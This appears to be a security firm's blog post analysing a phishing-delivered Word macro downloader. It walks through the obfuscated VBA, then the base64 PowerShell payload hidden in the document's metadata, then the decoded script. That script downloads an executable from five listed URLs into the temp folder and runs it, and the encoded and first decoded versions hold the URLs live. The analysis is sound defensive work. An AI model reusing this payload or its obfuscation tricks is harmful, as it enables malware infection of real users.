Analyzing a Recent Malware – W97 Downloader

We are facing high time in Word based macro downloaders. These documents use variety of techniques to hide malicious code in various OLE objects, obfuscation techniques and deploying final malware payload/binary. This sample we found in action recently. The document was delivered via phishing email.

So without much delay lets start-

The Email:

 

 

User receives above email related to Invoice. The email was not having any attachment but a link, which directly downloads the Macro enabled document (.doc) file.

 

 

The document can also be evaluated using Microsoft Word using Macro editor. But let’s analyze it without actually opening it in Word to avoid real infection. In this sample we will be using OfficeMalScanner to extract the Macro code from document without executing the code. We simply used below command to get details 

 OfficeMalScanner Malicious_Document.doc info 

As you can see the above command creates as folder in current working directory “Malicious_Document.DOC-Macros”. Please note “INVOICE 066679   REMINDER.DOC” was my document name which was downloaded from link.

The folder contains two files in which Module1 contains actual malicious macro code which we will be analyzing in a moment.

Let’s see how the Module1 code looks like. As given in below screenshot the code contains several dead functions which are doing nothing marked in red colored shape. The functions are never referenced in whole code nor called from anywhere. Just dummy functions to misguide the analyst.

Lets go through the code. The code starts with autoopen() routine which just calls function NRebpdnzYcTj. This shows that the code in function NRebpdnzYcTj() gets executed once the document is opened and Macro is enabled. To make the code more readable line breaks are inserted in the code. Alright, now lets examine the function line by line.

 
Public Function NRebpdnzYcTj() 
HPHPHPHPHP = "HPHPHPHPHP" 
VogdpLORDxKj = ActiveDocument.CustomDocumentProperties("ZGrKzNdbLO") + ActiveDocument.CustomDocumentProperties("yalDVOzTej") 
HPHPHPHPHP = "HPHPHPHPHP" 
qbWcDwlgyKdE = ActiveDocument.CustomDocumentProperties("CkvanxoTsD") + ActiveDocument.CustomDocumentProperties("dlKbgjhYHS") 
HPHPHPHPHP = "HPHPHPHPHP" 
alyuAFnqIXBp = VogdpLORDxKj + ActiveDocument.CustomDocumentProperties("mruRgsqxtb") + ActiveDocument.CustomDocumentProperties("UBwWIbsANm") + ActiveDocument.BuiltInDocumentProperties("Comments") 
CreateObject(qbWcDwlgyKdE + ActiveDocument.CustomDocumentProperties("mruRgsqxtb")).Run$ alyuAFnqIXBp, 0 
End Function

First line code declares a dummy variable HPHPHPHPHP and assigned the same value. This variable is actually never used throughout the code. This was added by author to add up some lines in the code and probably to eat up some brain of analyst.

The code uses technique to hide part of codes in custom properties of documents and other metadata, which is collected by code to generate actual code during execution. This type of code obfuscation technique is popular now a days. We are going to explore this technique used in our sample in few moments.

VogdpLORDxKj = ActiveDocument.CustomDocumentProperties("ZGrKzNdbLO") + ActiveDocument.CustomDocumentProperties("yalDVOzTej")
 

This line simply concatenates two strings which are stored in document’s custom properties (intentionally created by malware author to store data).

Here the value of custom properties “ZGrKzNdbLO” and “yalDVOzTej” which are “po” and “wershe” get concatenated in variable “VogdpLORDxKj” which is “powershe” after the line is executed.

Similarly second statement evaluates the value of variable “qbWcDwlgyKdE” as “WScript.She”. Did you saw that? Its building powershell and WScript tags.

Similarily third line contatenates the values from above two statements and other custom properties to generate a powershell command with payload stored in comments metadata of document.

Output of third line

alyuAFnqIXBp = powershell -e [base64 encoded payload obtained from comments]


This is important to see that the code is generating the PowerShell command to execute payload stored in comment metadata as shown in below screenshot.

 

We will have a detailed look at payload in coming section.

Last line of function evaluates as

CreateObject(WScript.Shell).Run$ alyuAFnqIXBp, 0

Where alyuAFnqIXBp is variable with the value as powershell command from previous statement.

Now let’s take a deeper look at powershell payload: Our team have copied the payload as it is from comments metadata s is given below:

 JAB7AHcAYABTAEMAcgBgAGkAcABUAH0AIAA9ACAAJgAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAJwBjAHQAJwAsACcAbgBlACcALAAnAHcALQBvAGIAagBlACcAKQAgAC0AQwBvAG0ATwBiAGoAZQBjAHQAIAAoACIAewAxAH0AewAwAH0AewAyAH0AIgAgAC0AZgAnAHQALgBTAGgAZQAnACwAJwBXAFMAYwByAGkAcAAnACwAJwBsAGwAJwApADsAJAB7AHcAYABFAEIAQwBgAGwAaQBlAE4AVAB9ACAAPQAgAC4AKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIALQBmACAAJwBvAGIAJwAsACcAbgBlAHcALQAnACwAJwBqAGUAYwB0ACcAKQAgACgAIgB7ADIAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADEAfQB7ADQAfQB7ADMAfQAiAC0AZgAnAHMAdAAnACwAJwBlAHQALgBXACcALAAnAFMAeQAnACwAJwBuAHQAJwAsACcAZQBiAEMAbABpAGUAJwAsACcAZQBtACcALAAnAC4ATgAnACkAOwAkAHsAUgBBAGAATgBkAG8ATQB9ACAAPQAgAC4AKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACcAdAAnACwAJwBuAGUAdwAtAG8AYgAnACwAJwBqAGUAYwAnACkAIAAoACIAewAyAH0AewAwAH0AewAxAH0AIgAgAC0AZgAnAGEAbgBkAG8AJwAsACcAbQAnACwAJwByACcAKQA7ACQAewB1AFIAYABMAFMAfQAgAD0AIAAoACIAewAyADQAfQB7ADkAfQB7ADIANwB9AHsANAB9AHsAMgAzAH0AewAwAH0AewAyADEAfQB7ADEAfQB7ADEAMwB9AHsANQB9AHsAMwB9AHsAMgA4AH0AewAzADEAfQB7ADIAMgB9AHsANgB9AHsAMQA1AH0AewAxADgAfQB7ADcAfQB7ADEAMQB9AHsAMwAzAH0AewAzADIAfQB7ADEAMAB9AHsAMQA3AH0AewAzADAAfQB7ADIAfQB7ADEANAB9AHsAMQA2AH0AewAxADIAfQB7ADIAMAB9AHsAMgA5AH0AewA4AH0AewAyADYAfQB7ADEAOQB9AHsAMgA1AH0AIgAgAC0AZgAgACcAdABRAC8ALABoAHQAJwAsACcAZgBmACcALAAnAC4AbgBlAHQALwBwAFMAeABLAFQALwAsAGgAdAAnACwAJwAuAGMAYQAvAFcAJwAsACcAZQB0AC8AYQBIAEgAWQAnACwAJwBiAGEAbABkACcALAAnAHAAOgAvAC8AJwAsACcALQBlACcALAAnAHIAZQAnACwAJwBwADoALwAvAGkAcwBwACcALAAnACwAaAB0AHQAJwAsACcAbgB0AC4AYwBvAG0ALwBCAEQAJwAsACcAYQB5AGMAJwAsACcAYQByAGMAaABpACcALAAnAHQAcAA6AC8ALwBnAGEAdAAnACwAJwBhACcALAAnAGUAdwAnACwAJwBwADoAJwAsACcAdgAnACwAJwBXAEwAZAAnACwAJwBlAG4AJwAsACcAdABwADoALwAvAGoAZQAnACwAJwBqAEMALwAsAGgAdAB0ACcALAAnAHYAagBkACcALAAnAGgAdAB0ACcALAAnAE8AagBuAHgARgBBAC8AJwAsACcAYwBoAHUAcgBjAGgALgBvAHIAZwAvACcALAAnADcALgBuACcALAAnAFYAJwAsACcAdAAnACwAJwAvAC8AYwBiAGEAaQAnACwAJwB6AFYARwAnACwAJwB6AC8AJwAsACcAUABwAFEASwAnACkALgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHQAJwAsACcAUwBwAGwAaQAnACkALgBJAG4AdgBvAGsAZQAoACcALAAnACkAOwAkAHsATgBgAEEAbQBFAH0AIAA9ACAAJAB7AHIAYABBAGAATgBEAG8ATQB9AC4AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAHgAdAAnACwAJwBuAGUAJwApAC4ASQBuAHYAbwBrAGUAKAAxACwAIAA2ADUANQAzADYAKQA7ACQAewBwAGAAQQB0AGgAfQAgAD0AIAAkAHsARQBgAE4AdgA6AHQARQBgAG0AcAB9ACAAKwAgACcAXAAnACAAKwAgACQAewBOAGAAQQBtAGUAfQAgACsAIAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcALgBlACcALAAnAHgAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJAB7AFUAYABSAEwAfQAgAGkAbgAgACQAewBVAGAAUgBsAFMAfQApAHsAdAByAHkAewAkAHsAVwBFAEIAYABDAEwAaQBgAGUAYABOAHQAfQAuACgAIgB7ADAAfQB7ADMAfQB7ADIAfQB7ADEAfQAiACAALQBmACAAJwBEACcALAAnAGwAZQAnACwAJwBpACcALAAnAG8AdwBuAGwAbwBhAGQARgAnACkALgBJAG4AdgBvAGsAZQAoACQAewBVAGAAUgBMAH0ALgAoACIAewAxAH0AewAwAH0AewAyAH0AIgAgAC0AZgAgACcAbwAnACwAJwBUACcALAAnAFMAdAByAGkAbgBnACcAKQAuAEkAbgB2AG8AawBlACgAKQAsACAAJAB7AFAAQQBgAFQAaAB9ACkAOwAuACgAIgB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQAiACAALQBmACAAJwBTAHQAYQByAHQALQAnACwAJwBQAHIAbwBjAGUAJwAsACcAcwAnACwAJwBzACcAKQAgACQAewBQAGAAQQB0AGgAfQA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsAJgAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAHMAdAAnACwAJwB3AHIAaQAnACwAJwB0AGUALQBoAG8AJwApACAAJAB7AF8AfQAuACIAZQBgAHgAQwBgAGUAUABUAEkATwBuACIALgAiAG0AZQBzAGAAUwBhAGAARwBlACIAOwB9AH0ADQAKAA==

This looks like obfuscated code encoded with Base64 encoding. I tried to decode the code using Burp Suite smart decoder and got the decoded string as shown below. There are plenty of tools who can do the same and some of the online tools also do it for you. The decoded code looks like as below:

 

 ${w`SCr`ipT} = &("{1}{2}{0}"-f'ct','ne','w-obje') -ComObject ("{1}{0}{2}" -f't.She','WScrip','ll');${w`EBC`lieNT} = .("{1}{0}{2}"-f 'ob','new-','ject') ("{2}{0}{5}{6}{1}{4}{3}"-f'st','et.W','Sy','nt','ebClie','em','.N');${RA`NdoM} = .("{1}{2}{0}"-f't','new-ob','jec') ("{2}{0}{1}" -f'ando','m','r');${uR`LS} = ("{24}{9}{27}{4}{23}{0}{21}{1}{13}{5}{3}{28}{31}{22}{6}{15}{18}{7}{11}{33}{32}{10}{17}{30}{2}{14}{16}{12}{20}{29}{8}{26}{19}{25}" -f 'tQ/,ht','ff','.net/pSxKT/,ht','.ca/W','et/aHHY','bald','p://','-e','re','p://isp',',htt','nt.com/BD','ayc','archi','tp://gat','a','ew','p:','v','WLd','en','tp://je','jC/,htt','vjd','htt','OjnxFA/','church.org/','7.n','V','t','//cbai','zVG','z/','PpQK').("{1}{0}"-f 't','Spli').Invoke(',');${N`AmE} = ${r`A`NDoM}.("{1}{0}" -f 'xt','ne').Invoke(1, 65536);${p`Ath} = ${E`Nv:tE`mp} + '\' + ${N`Ame} + ("{0}{1}" -f '.e','xe');foreach(${U`RL} in ${U`RlS}){try{${WEB`CLi`e`Nt}.("{0}{3}{2}{1}" -f 'D','le','i','ownloadF').Invoke(${U`RL}.("{1}{0}{2}" -f 'o','T','String').Invoke(), ${PA`Th});.("{0}{1}{3}{2}" -f 'Start-','Proce','s','s') ${P`Ath};break;}catch{&("{1}{2}{0}"-f 'st','wri','te-ho') ${_}."e`xC`ePTIOn"."mes`Sa`Ge";}}

Interesting, isn’t it? This looks like obfuscated code. Again, a level of obfuscation, but do not worry, its easy one. First lets make the payload more readable by separating individual statements.

 
${w`SCr`ipT} = &("{1}{2}{0}"-f'ct','ne','w-obje') -ComObject ("{1}{0}{2}" -f't.She','WScrip','ll'); ${w`EBC`lieNT} = .("{1}{0}{2}"-f 'ob','new-','ject') ("{2}{0}{5}{6}{1}{4}{3}"-f'st','et.W','Sy','nt','ebClie','em','.N'); 
${RA`NdoM} = .("{1}{2}{0}"-f't','new-ob','jec') ("{2}{0}{1}" -f'ando','m','r'); 
${uR`LS} = ("{24}{9}{27}{4}{23}{0}{21}{1}{13}{5}{3}{28}{31}{22}{6}{15}{18}{7}{11}{33}{32}{10}{17}{30}{2}{14}{16}{12}{20}{29}{8}{26}{19}{25}" -f 'tQ/,ht','ff','.net/pSxKT/,ht','.ca/W','et/aHHY','bald','p://','-e','re','p://isp',',htt','nt.com/BD','ayc','archi','tp://gat','a','ew','p:','v','WLd','en','tp://je','jC/,htt','vjd','htt','OjnxFA/','church.org/','7.n','V','t','//cbai','zVG','z/','PpQK').("{1}{0}"-f 't','Spli').Invoke(','); 
${N`AmE} = ${r`A`NDoM}.("{1}{0}" -f 'xt','ne').Invoke(1, 65536); 
${p`Ath} = ${E`Nv:tE`mp} + '\' + ${N`Ame} + ("{0}{1}" -f '.e','xe'); 
foreach(${U`RL} in ${U`RlS}) 
{
 try 
 {
  ${WEB`CLi`e`Nt}.("{0}{3}{2}{1}" -f 'D','le','i','ownloadF').Invoke(${U`RL}.("{1}{0}{2}" -f 'o','T','String').Invoke(), ${PA`Th}); 
  .("{0}{1}{3}{2}" -f 'Start-','Proce','s','s') ${P`Ath}; 
  break; 
 }
 catch 
 { 
 &("{1}{2}{0}"-f 'st','wri','te-ho') ${_}."e`xC`ePTIOn"."mes`Sa`Ge"; 
 }
}

Mainly three techniques are used here to obfuscate:

  1. Escape character (`) which is used to take next character literally which eventually does nothing here.
  2. Parametrized strings to generates strings from substrings
  3. Mix use of upper case and lower case characters to make code difficult to read.

After a level of de-obfuscation the powershell code looks like below:

${wSCripT} = &
new-object -ComObject WScript.Shell;
${w`EBC`lieNT} = .new-object System.Net.WebClient;
${RA`NdoM} = .new-object random;
 ${uR`LS} = hxxp://isp7[dot]net/aHHYvjdtQ/,hxxp://jeffarchibald[dot]ca/WVzVGjC/,hxxp://av-ent[dot]com/BDPpQKz/,hxxp://cbai[dot]net/pSxKT/,hxxp://gatewaycentrechurch[dot]org/WLdOjnxFA/;
 ${N`AmE} = (new-object random).next.Invoke(1, 65536);
 ${p`Ath} = ${E`Nv:tE`mp} + '\' + ${N`Ame} + ‘.exe’;
  foreach (${U`RL} in ${U`RlS})
  {
  try
  	{
  	${WEB`CLi`e`Nt}.DownloadFile.Invoke(${U`RL}.ToString.Invoke(), ${PA`Th});
  	 .Start-Process ${P`Ath};
  	 break;
  	}
  catch
  	{
  	&write-host ${_}."e`xC`ePTIOn"."mes`Sa`Ge";
  	}
  }

The code is trying to download the dropper from above mentioned five URLs mentioned in “{uR`LS}” and saving it with <random number(between 1 and 65536>.exe in appData/Temp directory. If download is failed from any of the URL code is trying to get the file from next URL. Once file is downloaded the code is trying to execute the file.

How it impacts you?

A single compromise can expose your infrastructure and assets to evil hands. It is difficult to assess the loss and manage situation when these attacks are in mass.

How can we help?

We can help in building awareness program for users/employees to deal with such threats.

We can help in building strategies and putting appropriate controls to avoid such situations.

Our expertise in dealing with such threats can help our clients to appropriately respond any new incident.

We can help in analyzing new threats and decoding the what/when/how questions.